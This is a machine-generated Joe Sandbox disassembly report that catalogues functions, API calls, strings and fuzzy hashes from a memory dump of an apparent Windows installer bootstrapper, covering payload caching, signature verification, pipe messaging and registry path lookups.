Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
String ID: GET$dlutil.cpp
API String ID: 2028584396-3303425918
Opcode ID: c103b463d31aafb1c281db8e02fec64efe2f5553c6703e9a40ba48ba272e2ff0
Instruction ID: 2097fa40b3f0933be3ece2f28cf45aa3f2a0075945624a96c05723fe5a6b93d3
Opcode Fuzzy Hash: c103b463d31aafb1c281db8e02fec64efe2f5553c6703e9a40ba48ba272e2ff0
Instruction Fuzzy Hash: 77615B71A00619ABDF61DFA8CC84BAF7BB9FF08764F114219FD15E2290E77099508FA0

Function 007D0AAE Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 007D0E7E: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,007D0ACD,?,00000000,?,00000000,00000000), ref: 007D0EAD

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 007D0C51
GetLastError.KERNEL32 ref: 007D0C5E

Strings

Failed to create syncpoint event., xrefs: 007D0C8C
plan.cpp, xrefs: 007D0C82
Failed to append cache action., xrefs: 007D0BA8
Failed to append package start action., xrefs: 007D0AF3
Failed to append payload cache action., xrefs: 007D0C08
Failed to append rollback cache action., xrefs: 007D0B2D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareCreateErrorEventLastString
String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
API String ID: 801187047-2489563283
Opcode ID: 19941246205b98d6c9c475a2e3ff68ed70960f19d7c5d43d9ae450220f87b3d2
Instruction ID: af7906e40e8f13164597f6d603d296d033e72d88153cbf0518677f4d0658806a
Opcode Fuzzy Hash: 19941246205b98d6c9c475a2e3ff68ed70960f19d7c5d43d9ae450220f87b3d2
Instruction Fuzzy Hash: 77617E75500604EFCB05DF68C980AAABBF9FF84314F21945BE815DB311EB35EA41DB90

Function 007C9DB4 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 147COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007C9DDA
_MREFOpen@16.MSPDB140-MSVCRT ref: 007C9DFF

Strings

Failed to get component path: %d, xrefs: 007C9E63
Failed to format component id string., xrefs: 007C9DE5
Failed to set variable., xrefs: 007C9EE3
Failed to format product code string., xrefs: 007C9E0A
MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 007C9EF3

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
API String ID: 3613110473-1671347822
Opcode ID: 88ba36a2892465d5e543d89fd259d0839c39e7bba6782a8fea82f2067304f33b
Instruction ID: 3c96030e0409f528c0473049bb291be3e6b17a8d8120386b252d3f0c01b1ee0e
Opcode Fuzzy Hash: 88ba36a2892465d5e543d89fd259d0839c39e7bba6782a8fea82f2067304f33b
Instruction Fuzzy Hash: 6E41E973900215BACBA5DA688C4EFBEB768EF24320F244A1EF711E11D1D7399E50D652

Function 007DD01A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 117threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,007DAB3C,?,00000000,00000000), ref: 007DD0B8
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007DD0C4
CloseHandle.KERNEL32(00000000,00000000,?,?,007DC59C,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 007DD145

Strings

Failed to create elevated cache thread., xrefs: 007DD0F2
Failed to pump messages in child process., xrefs: 007DD11C
LD|, xrefs: 007DD052, 007DD0E2, 007DD0F7
^S|, xrefs: 007DD070
elevation.cpp, xrefs: 007DD0E8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorHandleLastThread
String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$LD|$^S|$elevation.cpp
API String ID: 747004058-1605884229
Opcode ID: 395c266cfb623b818f5d25e86ade0a1a004df5c19b57aca1009c09c196bed987
Instruction ID: a6fbfc818b4dafbab7226fd223e63b076f295c6c529e7b7eb981895906cc99ee
Opcode Fuzzy Hash: 395c266cfb623b818f5d25e86ade0a1a004df5c19b57aca1009c09c196bed987
Instruction Fuzzy Hash: 6941D6B5E01219AFDB41DFA9D8859EEBBF8FF48310F10412AF918E7340D774A9418BA4

Function 00806ACD Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,7622DFD0,000000FF,name,000000FF,7622DFD0,?,7622DFD0,?,7622DFD0), ref: 00806B2B
CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,email,000000FF), ref: 00806B48
SysFreeString.OLEAUT32(00000000), ref: 00806B86
SysFreeString.OLEAUT32(00000000), ref: 00806BCD

Strings

uri, xrefs: 00806B56
email, xrefs: 00806B3A
name, xrefs: 00806B1D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$CompareFree
String ID: email$name$uri
API String ID: 3589242889-1168628755
Opcode ID: 1e05d36425057ed40567eba5f2fdc4fbd09c74c34b0767ac4df37f70417af2dd
Instruction ID: d39c810192f2552fc5e0f5691ac7c5c8adbf03fb37d971388c3df943a4ae2065
Opcode Fuzzy Hash: 1e05d36425057ed40567eba5f2fdc4fbd09c74c34b0767ac4df37f70417af2dd
Instruction Fuzzy Hash: 76415B75A04219BBCB51DB94CC55FAEB7B4FF04730F2042A5E921EA2E0E7309E60DB90

Function 007D473A Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 115fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,00000008,?,00000000,?,00000000,00000000,?,00000000,@G|,?,?,00000000,?,00000000), ref: 007D4765
GetLastError.KERNEL32 ref: 007D4772
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 007D481B
GetLastError.KERNEL32 ref: 007D4825

Strings

Failed to read message from pipe., xrefs: 007D47F0
pipe.cpp, xrefs: 007D47CF, 007D47E6, 007D4849
Failed to read data for message., xrefs: 007D4853
Failed to allocate data for message., xrefs: 007D47D9

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$pipe.cpp
API String ID: 1948546556-3912962418
Opcode ID: aab6f2fd4315212fabaa91e51ea5ebcd5bd5363d6afa72efedb1a95d47bc6bd1
Instruction ID: eaa0096a8d111fd9d1d79981e550bde0c489d81400aa328d98604f1e49eb14c2
Opcode Fuzzy Hash: aab6f2fd4315212fabaa91e51ea5ebcd5bd5363d6afa72efedb1a95d47bc6bd1
Instruction Fuzzy Hash: C131B672E40325BBE7109F65DC45BAAB7B8FF05761F10812BF815E6680E7789E409BD0

Function 007CF2DC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007CF315

Part of subcall function 007C4013: CreateDirectoryW.KERNELBASE(007C533D,007C53B5,00000000,00000000,?,007D9EE4,00000000,00000000,007C533D,00000000,007C52B5,00000000,?,=S|,007CD4AC,=S|), ref: 007C4021
Part of subcall function 007C4013: GetLastError.KERNEL32(?,007D9EE4,00000000,00000000,007C533D,00000000,007C52B5,00000000,?,=S|,007CD4AC,=S|,00000000,00000000), ref: 007C402F

lstrlenA.KERNEL32(0080B4F0,00000000,00000094,00000000,00000094,?,?,007D0328,swidtag,00000094,?,0080B508,007D0328,00000000,?,00000000), ref: 007CF368

Part of subcall function 00804C67: CreateFileW.KERNEL32(0080B4F0,40000000,00000001,00000000,00000002,00000080,00000000,007D0328,00000000,?,007CF37F,?,00000080,0080B4F0,00000000), ref: 00804C7F
Part of subcall function 00804C67: GetLastError.KERNEL32(?,007CF37F,?,00000080,0080B4F0,00000000,?,007D0328,?,00000094,?,?,?,?,?,00000000), ref: 00804C8C

Strings

swidtag, xrefs: 007CF328
Failed to allocate regid file path., xrefs: 007CF3C0
Failed to format tag folder path., xrefs: 007CF3CE
Failed to create regid folder: %ls, xrefs: 007CF3B0
Failed to write tag xml to file: %ls, xrefs: 007CF3A6
Failed to allocate regid folder path., xrefs: 007CF3C7

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
API String ID: 904508749-1201533908
Opcode ID: ba7761e9b3c786dc9da96c348d5e116d94eb3754ac8624c221f4423ef94a2412
Instruction ID: 5796fce2c86faa8c79292a514e415111289f1d13da480c1bf9663f5a3e27568c
Opcode Fuzzy Hash: ba7761e9b3c786dc9da96c348d5e116d94eb3754ac8624c221f4423ef94a2412
Instruction Fuzzy Hash: 3A317E72D00619FBCB119E94DC01F9DBBB6FF04710F10817EE911EA290EB799A919B90

Function 007D51E9 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 90synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,007C5386,00000000,00000000,?,00000000), ref: 007D5292
GetLastError.KERNEL32(?,?,?,007C4B5B,?,?,00000000,?,?,?,?,?,?,0080B490,?,?), ref: 007D529D

Strings

Failed to write exit code to message buffer., xrefs: 007D520D
Failed to write restart to message buffer., xrefs: 007D5235
pipe.cpp, xrefs: 007D52C1
Failed to wait for child process exit., xrefs: 007D52CB
Failed to post terminate message to child process cache thread., xrefs: 007D5261
Failed to post terminate message to child process., xrefs: 007D527D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
API String ID: 1211598281-2161881128
Opcode ID: 70bff0dd80174530a3a05d565b6ca86b97887c38cc927fbf565cef6269531241
Instruction ID: f6b7880f041d76118fc865dc3968851591e836f62abe90a29e9f35fe5a66c705
Opcode Fuzzy Hash: 70bff0dd80174530a3a05d565b6ca86b97887c38cc927fbf565cef6269531241
Instruction Fuzzy Hash: 9621D573941B29BBDB1256949C05E9EBBB8FF10321F110317F910F6390D739AD54A6E0

Function 007D8E92 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 88fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,007D9CFF,00000003,000007D0,00000003,?,000007D0), ref: 007D8EAC
GetLastError.KERNEL32(?,007D9CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000000,-00000004), ref: 007D8EB9
CloseHandle.KERNEL32(00000000,?,007D9CFF,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000000), ref: 007D8F80

Strings

Failed to open payload at path: %ls, xrefs: 007D8EFC
Failed to verify catalog signature of payload: %ls, xrefs: 007D8F47
Failed to verify signature of payload: %ls, xrefs: 007D8F28
Failed to verify hash of payload: %ls, xrefs: 007D8F6B
cache.cpp, xrefs: 007D8EEF

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
API String ID: 2528220319-2757871984
Opcode ID: 357581a4f97758c196c12db3c8cce02c6c31f11879975b9f2034ec2f40065990
Instruction ID: a72d6dfd03908e020fe5a37edcb3c40330028688dcfc652f2bad1846143d0815
Opcode Fuzzy Hash: 357581a4f97758c196c12db3c8cce02c6c31f11879975b9f2034ec2f40065990
Instruction Fuzzy Hash: 1A21F732640625BAD7621B648C49FAA7B3AFF00770F144216FD10B6390EB3D9C60DAD2

Function 007C69B8 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 007C6A03
GetLastError.KERNEL32 ref: 007C6A0D
GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 007C6A51
GetLastError.KERNEL32 ref: 007C6A5B

Strings

Failed to get volume path name., xrefs: 007C6A89
Failed to set variant value., xrefs: 007C6AA5
Failed to get windows directory., xrefs: 007C6A3B
variable.cpp, xrefs: 007C6A31, 007C6A7F

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$DirectoryNamePathVolumeWindows
String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
API String ID: 124030351-4026719079
Opcode ID: 6645a14365d25796fd598e07177f53458833e21f1b2bfe73c0eb17be687f2abf
Instruction ID: bdbfcf5afc3e2decb2e82a6e1aa3984e0649f4acd9eca93914b369da77bca98a
Opcode Fuzzy Hash: 6645a14365d25796fd598e07177f53458833e21f1b2bfe73c0eb17be687f2abf
Instruction Fuzzy Hash: F121F972F00328ABEB20AB658C49F9B73ECEB44710F01816EFD05F7181E6389D4186E5

Function 007C9B3F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 86COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007C9B5A
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 007C9B72
GetLastError.KERNEL32 ref: 007C9B81

Strings

search.cpp, xrefs: 007C9BB3
Failed to set variable., xrefs: 007C9C07
File search: %ls, did not find path: %ls, xrefs: 007C9BD5
Failed get to file attributes. '%ls', xrefs: 007C9BC0
Failed to format variable string., xrefs: 007C9B65

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
API String ID: 1811509786-2053429945
Opcode ID: c4619e9fac4b1b3ec14d14a71ce2a699c4806a55d93214adb1d527fbcc3c369a
Instruction ID: c36b3065fe81423a1cd3bbd8d6488be4de2ef2afbb50b440629f943f455b90ba
Opcode Fuzzy Hash: c4619e9fac4b1b3ec14d14a71ce2a699c4806a55d93214adb1d527fbcc3c369a
Instruction Fuzzy Hash: E4212932E40614BBDB916AA49D4AF6EB769FF14310F10422DFA10E1190E7799D50DAE1

Function 007DAB3C Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 007DAB53
GetLastError.KERNEL32 ref: 007DAB5D
CoInitializeEx.OLE32(00000000,00000000), ref: 007DAB9C
CoUninitialize.OLE32(?,007DC4F4,?,?), ref: 007DABD9

Strings

Failed to pump messages in child process., xrefs: 007DABC7
Failed to set elevated cache pipe into thread local storage for logging., xrefs: 007DAB8B
elevation.cpp, xrefs: 007DAB81
Failed to initialize COM., xrefs: 007DABA8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorInitializeLastUninitializeValue
String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
API String ID: 876858697-113251691
Opcode ID: 9cf7130eee72baa5c92102ba5b9009ba75adb42c16ef1c4fcd3b9c961465def4
Instruction ID: 44d5aa6942c2116bef9229029bb4052a5a094ca81cc9741fe6fa5518b333c812
Opcode Fuzzy Hash: 9cf7130eee72baa5c92102ba5b9009ba75adb42c16ef1c4fcd3b9c961465def4
Instruction Fuzzy Hash: 811106B2941631BBD71117699C06D9BBEBCFF00B60B11411BFC05F3350EB689C1196D2

Function 007C5BF0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00800E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00805699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00800E52

RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 007C5C77

Strings

CommonFilesDir, xrefs: 007C5C03, 007C5C33, 007C5C42
+, xrefs: 007C5BFD
Failed to read folder path for '%ls'., xrefs: 007C5C43
SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 007C5C14
Failed to ensure path was backslash terminated., xrefs: 007C5C61
Failed to open Windows folder key., xrefs: 007C5C29
ProgramFilesDir, xrefs: 007C5BF8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
API String ID: 47109696-3209209246
Opcode ID: 0d53fb3cdc20e8bdf5e6c56ee81599787b82e47f5939a90b0eef6c5f0304d5e5
Instruction ID: cf2ab8ad61834ac6fd3eaaca88ff0b84cab76b37e9f4a2ca987caa67c69989e0
Opcode Fuzzy Hash: 0d53fb3cdc20e8bdf5e6c56ee81599787b82e47f5939a90b0eef6c5f0304d5e5
Instruction Fuzzy Hash: B401F932A40B39B7CB626A94DD06F9E7768FB00770F10016DF800F6291DB799E5096E1

Function 007EA024 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 172COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,00000001,00000000,?), ref: 007EA0F1
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 007EA0FB

Strings

Failed attempt to download URL: '%ls' to: '%ls', xrefs: 007EA1D8
:, xrefs: 007EA174
apply.cpp, xrefs: 007EA11F
download, xrefs: 007EA0BB
Failed to clear readonly bit on payload destination path: %ls, xrefs: 007EA12A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
API String ID: 1799206407-1905830404
Opcode ID: 9d20ff07d07fcb338303e2154ec218b7e1f64c84761dd11ec8d7d70655537c25
Instruction ID: cdcd62100dc979ecd8fce0ff33856f5ce5072f44b8f63bdceb9d82e772ddd11b
Opcode Fuzzy Hash: 9d20ff07d07fcb338303e2154ec218b7e1f64c84761dd11ec8d7d70655537c25
Instruction Fuzzy Hash: 0A519271A01209BFDB11DF99C840FAABBB5FF08710F108169E915EB251E379EE40CB92

Function 00806DA8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,7622DFD0,000000FF,type,000000FF,?,7622DFD0,7622DFD0,7622DFD0), ref: 00806DFE
SysFreeString.OLEAUT32(00000000), ref: 00806E49
SysFreeString.OLEAUT32(00000000), ref: 00806EC5
SysFreeString.OLEAUT32(00000000), ref: 00806F11

Strings

url, xrefs: 00806E11
type, xrefs: 00806DF0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$Free$Compare
String ID: type$url
API String ID: 1324494773-1247773906
Opcode ID: cb18495aebf1d5e7fc88f14406ed4afe58deb211ba98bbde20ea5155876506cd
Instruction ID: d3936e414e422fcb868b686e9a0621883becaa25b08536b4832c75ffb028a17d
Opcode Fuzzy Hash: cb18495aebf1d5e7fc88f14406ed4afe58deb211ba98bbde20ea5155876506cd
Instruction Fuzzy Hash: 02515F7590121AEBDF55DB94CC44EAEBBB8FF04711F2042A9E411EB1A0EB31AE60DB50

Function 0080837F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000000,?,?,007E8E1F,000002C0,00000100), ref: 008083AD
CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,007E8E1F,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 008083C8

Strings

application, xrefs: 008083BA
apuputil.cpp, xrefs: 00808463
type, xrefs: 008083EF
http://appsyndication.org/2006/appsyn, xrefs: 008083A0

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
